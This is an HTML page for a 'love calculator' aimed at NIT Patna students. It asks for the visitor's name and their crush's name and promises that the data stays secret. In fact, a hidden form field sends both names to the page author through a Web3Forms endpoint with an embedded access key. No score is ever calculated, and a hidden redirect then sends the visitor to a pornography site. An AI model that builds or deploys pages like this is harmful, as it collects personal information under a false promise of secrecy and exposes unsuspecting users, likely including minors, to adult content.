<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Try this now!</title>

    <style>
        body{
            background: url(background.jpg);
            background-size: cover;
            background-repeat: none;
        }

        h1{
            text-align: center;
            font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
            font-weight: 900;
            font-size: 2.2rem;
        }

        p{
            text-align: center;
            font-size: 1.1rem;
            background-color: rgba(255, 255, 255, 0.4);
            backdrop-filter: blur(4px);
            border-radius: 20px;
            padding: 10px;
        }

        .container{
            margin: 0 auto;
            width:fit-content;
        }

        input{
            border-radius: 10px;
            font-size: 1.2rem;
            border: none;
            padding: 5px;
            margin: auto 10px;
        }

        form{
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 10px;
            padding: 20px;
            border-radius: 20px;
            background-color: rgba(255, 255, 255, 0.445);
            backdrop-filter: blur(5px);
        }



        button{
            margin: 0 auto;
            border-radius: 10px;
            background-color: rgb(84, 249, 24);
            border: 1px solid black;
            padding: 10px;
            font-weight: bold;
        }

        @media screen and (max-width : 500px){
            body{
                background: url(mobile.jpg);
                background-size: cover;
                background-repeat: no-repeat;

            }
            
        }
    </style>
</head>
<body>
    <h1>NIT Patna | Find your <i class="fa fa-heart" aria-hidden="true" style="color: red;"></i></h1>

    <p>This website shows how much love is in between you and your crush</p>
    <p>We will not tell anyone ! The data will be kept secret <i class="fa fa-eye-slash" aria-hidden="true"></i></p>

    <div class="container">
        <form action="https://api.web3forms.com/submit" method="POST">
            <input type="hidden" name="access_key" value="5e99f79d-5a30-4087-82d2-499fbd7bd1fc" />
            <input type="hidden" name="subject" value="New Submission from Web3Forms" />
            <input type="hidden" name="redirect" value="https://xhamster1.desi/" />
            <input type="text" placeholder="Your name" name="boy">
            <i class="fa fa-heartbeat" aria-hidden="true" style="color: rgb(216, 27, 153); font-size: 2rem;"></i>
            <input type="text" placeholder="Crush name" name="girl">
            <br>
            <button>Check Score</button>
        </form>
    </div>

    


    <script src="https://kit.fontawesome.com/b51a57a65a.js" crossorigin="anonymous"></script>
    <script>
        
    </script>
</body>
</html> 